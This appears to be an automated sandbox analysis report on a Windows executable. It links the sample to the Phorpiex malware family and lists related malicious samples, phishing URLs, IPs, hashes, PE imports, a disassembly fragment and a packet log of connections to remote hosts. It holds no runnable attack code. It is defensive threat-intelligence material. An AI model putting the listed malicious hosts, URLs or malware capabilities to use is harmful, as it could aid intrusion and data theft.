	file.exe	Get hash	malicious	Eternity Stealer, LummaC Stealer, SmokeLoader, Vidar, zgRAT	Browse	198.245.60.91
	http://camparowhon.com	Get hash	malicious	Unknown	Browse	51.222.241.106
	https://free-pdf-pro.com	Get hash	malicious	Unknown	Browse	51.195.5.194
	bBpYD3aXuL.exe	Get hash	malicious	BazaLoader, SmokeLoader	Browse	51.75.129.204
	LIgiTBz5qJ.exe	Get hash	malicious	AgentTesla	Browse	144.217.198.22
	PVmTRgBVL0.exe	Get hash	malicious	AgentTesla	Browse	144.217.198.22
	ONbKLCjIMD.exe	Get hash	malicious	FormBook	Browse	144.217.103.3
	1uPo6vy0ih.exe	Get hash	malicious	Snake Keylogger	Browse	51.38.247.67
	q3qJ5G153F.exe	Get hash	malicious	AgentTesla	Browse	91.121.38.6
	http://checkrain.com	Get hash	malicious	Unknown	Browse	149.56.240.27
	https://www.family-history.co.za/supp/MitlD/dk/oo/	Get hash	malicious	HTMLPhisher	Browse	158.69.119.97
	https://wallpapercave.com/	Get hash	malicious	Unknown	Browse	51.222.39.187
	https://cbbreogan.servidortierra.com/upload/css/zx/	Get hash	malicious	Unknown	Browse	151.80.237.40
	https://www.anti.wizbest.com/	Get hash	malicious	Unknown	Browse	51.222.239.232
	https://www.google.com/amp/s/app.clientrelationbuilder.com/Doc///marc.farmer///bWFyYy5mYXJtZXJAb3prLmNvbQ==	Get hash	malicious	Unknown	Browse	51.68.142.31
	https://trk.klclick2.com/ls/click?upn=HVRWduvhL1zapb3BWQOCNiPIi5Bk5xLLCIGZPop7usQOZKKmWM-2FwHVR04uMIbc47xtIdXZ70-2BNqYC0slo1nan2opQ-2B0-2BSPXYqBzVTOGvUKZN1SahTtz7QmlDPDVfDJipVY4C-2F3dQtPrOpXEgvo4fCQS15iHO9tJjGaId-2FMb-2FkgM-3D4tc5_UQf6CZtgTiGkpBx1ujDHnZAntAuJNxWSG9pjq-2BiEMRDParvahGK2lvPcgi8z-2B-2BWUg4E10bFWhVQPx2J677B6FBKUouSDfFq-2BrhMyxGoFM-2F8OlmejfVTB4PqW6-2FjNChjlUMO-2B-2FXHCYyxLE0zjL9eSFxVBB0U-2BL17Utt4sh-2FoCed8SEzD2sagFG2abKMXdNJ7z8B3sNYIOWG1DEb4GIJgIUqTnJWFBPsjyTZTwjWh2fasTBMud-2BGFZmMBlUYhzyNDWqusvN0q6yzs-2FKzKyCsUKXO9RIzb-2BVNG2oBtNCXWQ548tUzZf1t-2BzLfcHu0MWrm9yF196hpRfidigA7rGe80R-2BoMR4Lt3-2FiXqfBcW2Jf0CqPCxxO-2FMbOmIF5KHqthpQWlSTMx2RinslX-2FyLyq256AseNlyUEOcYp4MVdxlFD5M9JY18wec3WYUGH5-2BObD18daomOPH2b-2FLqYgYJdnS4m0Rg-3D-3D#am9lLm1lbm5pbmdlckB5b3VyYmVzdGN1LmNvbQ====qaivbcvwqpmzofncfib=Z29vZ2xlLmNvbQ==&d=DwMGaQ	Get hash	malicious	HTMLPhisher	Browse	51.81.42.250
	stub.exe	Get hash	malicious	AsyncRAT	Browse	51.195.251.9
DATAWAGONUS	http://104.192.3.74	Get hash	malicious	Unknown	Browse	104.192.3.74
	jAgj6bRWaJ.elf	Get hash	malicious	Mirai, Moobot	Browse	104.224.1.83
	bLnG.exe	Get hash	malicious	Quasar	Browse	104.219.234.167
	ONKp7JSC5S.elf	Get hash	malicious	Mirai	Browse	104.224.1.58
	Qp0NtYJBeV.exe	Get hash	malicious	Quasar, Vermin Keylogger	Browse	172.81.131.113
	9o7IiBFnFS.exe	Get hash	malicious	EICAR, Vermin Keylogger	Browse	172.81.131.113
	jD4JWHlWlw.exe	Get hash	malicious	AveMaria, EICAR, UACMe, Vermin Keylogger	Browse	172.81.131.113
	SecuriteInfo.com.Trojan.PWS.Steam.33515.21594.25697.exe	Get hash	malicious	RedLine	Browse	104.192.2.242
	file.exe	Get hash	malicious	Amadey, RedLine	Browse	104.192.2.242
	O6tQQyRId9.exe	Get hash	malicious	Amadey, CryptOne, RedLine	Browse	104.192.2.242
	aO3OP6lo9T.exe	Get hash	malicious	RedLine	Browse	104.192.2.242
	nCguwHABqhXZAo.dll.dll	Get hash	malicious	BumbleBee	Browse	104.219.233.38
	nCguwHABqhXZAo.dll.dll	Get hash	malicious	BumbleBee	Browse	104.219.233.38
	x8TZhOscJi.exe	Get hash	malicious	RedLine	Browse	104.192.2.242
	dMvOmUQpUL.exe	Get hash	malicious	RedLine	Browse	104.192.2.242
	5vzS8wok7q.exe	Get hash	malicious	Neshta, RedLine	Browse	104.192.2.242
	rXDInw0GtH.exe	Get hash	malicious	RedLine	Browse	104.192.2.242
	file.exe	Get hash	malicious	DanaBot, RedLine, SmokeLoader	Browse	172.81.129.182
	Specification&Drawaing&Size&Quantity.exe	Get hash	malicious	RedLine	Browse	104.224.30.55
	kLXwf9JGfE	Get hash	malicious	Mirai	Browse	104.224.1.77

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fc54e0d16d9764783542f0146a98b300	2oK.exe	Get hash	malicious	DCRat	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	EYBfU.exe	Get hash	malicious	DCRat	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	KK63Cn92dU.exe	Get hash	malicious	Phonk Miner, Xmrig	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	Yhx3rg6GE4.exe	Get hash	malicious	Phonk Miner, Xmrig, zgRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	G3KugQ8kiX.exe	Get hash	malicious	Phonk Miner, Xmrig, zgRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	K92v0CujUu.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	yD4vgUNMMb.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig, zgRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	PtUWVASbnv.exe	Get hash	malicious	Parallax RAT, Phonk Miner, Xmrig, zgRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	0817.exe	Get hash	malicious	AsyncRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	0821-1351.exe	Get hash	malicious	AsyncRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	0815.exe	Get hash	malicious	AsyncRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	0808-1427.exe	Get hash	malicious	AsyncRAT	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	HEUR-Trojan-Spy.MSIL.Stealer.gen-34669303b457.exe	Get hash	malicious	DCRat	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	farc75O3fe.exe	Get hash	malicious	Unknown	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	25DB06AABF72392BE5659C5E97F6202AFFC2601F2A49D.exe	Get hash	malicious	RedLine	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	5BImyJbP7u.exe	Get hash	malicious	Raccoon Stealer v2	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	95b3PKNWql.exe	Get hash	malicious	Raccoon Stealer v2	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	HEUR-Backdoor.MSIL.LightStone.gen-6176ead8802.exe	Get hash	malicious	DCRat	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	file.exe	Get hash	malicious	Unknown	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244
	file.exe	Get hash	malicious	Unknown	Browse	149.56.44.47 172.81.131.84 207.244.78.230 66.175.235.244

Process:	C:\Users\user\Desktop\6K1uYM85lS.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	6.615566232216998
Encrypted:	false
SSDEEP:	3072:8q7DiX2FNAVWllSP8QLZwgtTIFFjB/0SA:N7DiQWTlZw3FjJA
MD5:	2D5E7BABF1B2D92B56FDA0B9044F889A
SHA1:	D2F1F6A1E267172FC183A0D1A2AFFDD26145F59D
SHA-256:	8CD916321F1C8A63BD9FAFB52A478AC65B3E86A33966BBFCE60F5E46FFEE6B8C
SHA-512:	68167664FC5E957B9AEE18713DDF975823A73713D6C2FE31F532DCB53BEE280A7FBFDA68961A514D049558C602D74E91B24995FC1153E3F376CEA5EBC7F93688
Malicious:	true
Yara Hits:	Rule: MALWARE_Win_Phorpiex, Description: Detects Phorpiex variants, Source: C:\180771693628709\lsass.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 72%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...cQ..G...cQ..V...D.......+...G......F...+...O...Z.].E...Z.H.E...RichD...........................PE..L.....`.................6...\......zB.......P....@.......................................@..................................w..................................\|....S...............................................P...............................text....4.......6.................. ..`.rdata...6...P...8...:..............@..@.data...\............r..............@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.615566232216998
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6K1uYM85lS.exe
File size:	114'688 bytes
MD5:	2d5e7babf1b2d92b56fda0b9044f889a
SHA1:	d2f1f6a1e267172fc183a0d1a2affdd26145f59d
SHA256:	8cd916321f1c8a63bd9fafb52a478ac65b3e86a33966bbfce60f5e46ffee6b8c
SHA512:	68167664fc5e957b9aee18713ddf975823a73713d6c2fe31f532dcb53bee280a7fbfda68961a514d049558c602d74e91b24995fc1153e3f376cea5ebc7f93688
SSDEEP:	3072:8q7DiX2FNAVWllSP8QLZwgtTIFFjB/0SA:N7DiQWTlZw3FjJA
TLSH:	12B35B22E511C53DF46101B7DBBAA9BF6A28AD30130530C3F3D06DE66A659E27D3026F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........D...D...D...cQ..G...cQ..V...D.......+...G.......F...+...O...Z.].E...Z.H.E...RichD...........................PE..L......`...

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x41427a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6080EED3 [Thu Apr 22 03:34:43 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	23ab644c44593e426ea915e5618d637d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00417778h
push 00414400h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 68h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
xor ebx, ebx
mov dword ptr [ebp-04h], ebx
push 00000002h
call dword ptr [00415184h]
pop ecx
or dword ptr [0041A350h], FFFFFFFFh
or dword ptr [0041A354h], FFFFFFFFh
call dword ptr [00415188h]
mov ecx, dword ptr [0041A34Ch]
mov dword ptr [eax], ecx
call dword ptr [0041518Ch]
mov ecx, dword ptr [0041A348h]
mov dword ptr [eax], ecx
mov eax, dword ptr [00415190h]
mov eax, dword ptr [eax]
mov dword ptr [0041A358h], eax
call 00007FBA547CC535h
cmp dword ptr [00419D90h], ebx
jne 00007FBA547CC42Eh
push 004143F6h
call dword ptr [00415194h]
pop ecx
call 00007FBA547CC507h
push 0041900Ch
push 00419008h
call 00007FBA547CC4F2h
mov eax, dword ptr [0041A344h]
mov dword ptr [ebp-6Ch], eax
lea eax, dword ptr [ebp-6Ch]
push eax
push dword ptr [0041A340h]
lea eax, dword ptr [ebp-64h]
push eax
lea eax, dword ptr [ebp-70h]
push eax
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [0041519Ch]
push 00419004h
push 00419000h
call 00007FBA547CC4BFh

Rich Headers

Programming Language:

[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[C++] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x177b4	0xdc	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1b000	0x1b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x1c000	0x107c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x15310	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x15000	0x304	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x13418	0x13600	False	0.46165574596774195	data	6.130960356629228	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15000	0x36ae	0x3800	False	0.5006277901785714	data	5.464324159889571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x19000	0x135c	0xe00	False	0.44252232142857145	Matlab v4 mat-file (little endian) \377\377\377\377\311\017\332\242!h\3024\304\306b\213\200\334\034\321)\002N\010\212g\314t\002\013\276\246;\023\233"QJ\010y\2164\004\335\357\225\031\263\315:C\0330+, numeric, rows 0, columns 0	4.877874103524275	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x1b000	0x1b4	0x200	False	0.490234375	data	5.105006099278344	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x1c000	0x121e	0x1400	False	0.7033203125	data	6.1436459997367185	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x1b058	0x15a	ASCII text, with CRLF line terminators	English	United States	0.5491329479768786

Imports

DLL	Import
MSVCRT.dll	_controlfp, memmove, _except_handler3, __set_app_type, __p__fmode, __p__commode, _adjust_fdiv, __setusermatherr, _initterm, __getmainargs, _acmdln, exit, _XcptFilter, _exit, wcscmp, srand, rand, mbstowcs, strchr, strcmp, _wfopen, fseek, ftell, fclose, memset, _mbsstr, strlen, isalpha, isdigit, wcsstr, wcslen, iswalpha, iswdigit, memcpy, ??3@YAXPAX@Z, ??2@YAPAXI@Z, strtol, memchr, memcmp
WININET.dll	InternetCloseHandle, InternetOpenUrlA, InternetOpenA, HttpQueryInfoA, InternetOpenUrlW, InternetOpenW, InternetReadFile
urlmon.dll	URLDownloadToFileW
SHLWAPI.dll	PathMatchSpecW, StrCmpNW, PathFileExistsW, PathFindFileNameW, PathFileExistsA
WS2_32.dll	setsockopt, send, getaddrinfo, recv, socket, connect, closesocket, listen, bind, htonl, htons, inet_pton, ntohl, shutdown, WSACleanup, WSAStartup, getsockname, ntohs, WSAAccept, WSARecv, WSASend, WSAGetLastError, freeaddrinfo, inet_ntop
KERNEL32.dll	GlobalAlloc, GlobalLock, GlobalUnlock, WaitForMultipleObjects, GetQueuedCompletionStatus, PostQueuedCompletionStatus, LoadLibraryA, GetProcAddress, lstrlenW, TerminateThread, CloseHandle, CreateIoCompletionPort, SleepEx, SetLastError, GlobalFree, GetSystemTimeAsFileTime, GetTickCount, lstrcpynA, ExitThread, SetEndOfFile, SetFilePointer, UnmapViewOfFile, MapViewOfFile, CreateFileMappingA, GetFileSize, CreateFileW, CreateProcessW, GetLocaleInfoA, DeleteFileW, WriteFile, ExpandEnvironmentStringsW, lstrcpyW, QueryDosDeviceW, GetDriveTypeW, GetLogicalDrives, RemoveDirectoryW, FindClose, FindNextFileW, MoveFileExW, lstrcmpW, WaitForSingleObject, GetLastError, GetStartupInfoA, GetModuleHandleA, MoveFileW, MoveFileA, DeleteFileA, ExitProcess, CreateMutexA, CopyFileA, CreateThread, GetTempPathW, GetModuleFileNameW, GetVolumeInformationW, SetFileAttributesW, CopyFileW, lstrcmpiW, CreateDirectoryW, lstrlenA, Sleep, HeapReAlloc, HeapAlloc, HeapFree, GetProcessHeap, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSection, DeleteCriticalSection, FindFirstFileW
USER32.dll	FindWindowA, ShowWindow, SetForegroundWindow, CloseWindow, SetFocus, wsprintfA, wsprintfW, GetClipboardData, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard
ADVAPI32.dll	CryptReleaseContext, CryptGenRandom, CryptEncrypt, CryptDestroyKey, CryptGetKeyParam, CryptImportKey, CryptSetKeyParam, CryptDestroyHash, CryptHashData, CryptCreateHash, CryptGetHashParam, CryptDuplicateHash, CryptExportKey, CryptVerifySignatureA, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegSetValueExW, CryptAcquireContextW, CryptAcquireContextA
SHELL32.dll	ShellExecuteW
ole32.dll	CoInitializeEx, CoCreateInstance

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2024 15:38:25.024310112 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:25.266236067 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:25.266447067 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:25.268291950 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:25.509552956 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:25.509865999 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:25.510082960 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:26.519258022 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:26.760432005 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:26.760479927 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:26.761126041 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:27.946547031 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:28.189996004 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:28.190026999 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:28.190318108 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:30.354223967 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:30.595370054 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:30.595449924 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:31.611371994 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:31.852922916 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:31.853020906 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:32.863312960 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:33.104935884 CET	80	49719	185.215.113.93	192.168.2.6
Jan 10, 2024 15:38:33.105077982 CET	49719	80	192.168.2.6	185.215.113.93
Jan 10, 2024 15:38:59.954801083 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.160960913 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.161066055 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.161336899 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.367526054 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375082016 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375094891 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375107050 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375118971 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375173092 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375173092 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.375226021 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.375226021 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.375253916 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.375300884 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.379215956 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.379230022 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.379271984 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.379272938 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.379312038 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.379312992 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.379407883 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.379451990 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581268072 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581289053 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581341028 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581374884 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581413031 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581423998 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581478119 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581513882 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581568003 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581588984 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581650019 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581680059 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581811905 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581823111 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.581934929 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.581984997 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.582117081 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.582202911 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.582236052 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.582269907 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.582302094 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.582685947 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.585156918 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585175991 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585308075 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585340023 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.585370064 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.585405111 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585484982 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585537910 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.585618019 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585702896 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585803032 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.585853100 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793266058 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793293953 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793307066 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793318987 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793337107 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793416023 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793417931 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793417931 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793431997 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793457985 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793484926 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793486118 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793530941 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793535948 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793576002 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793598890 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793653011 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793657064 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793682098 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793704987 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793704987 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793725967 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793746948 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793874025 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793898106 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793910027 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.793924093 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793951988 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.793976068 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.794019938 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.794019938 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.794099092 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.794112921 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.794145107 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.794173956 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.794943094 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.794985056 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.794997931 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.795008898 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.795039892 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.795041084 CET	9030	49726	193.11.164.243	192.168.2.6
Jan 10, 2024 15:39:00.795039892 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.795088053 CET	49726	9030	192.168.2.6	193.11.164.243
Jan 10, 2024 15:39:00.795131922 CET	9030	49726	193.11.164.243	192.168.2.6
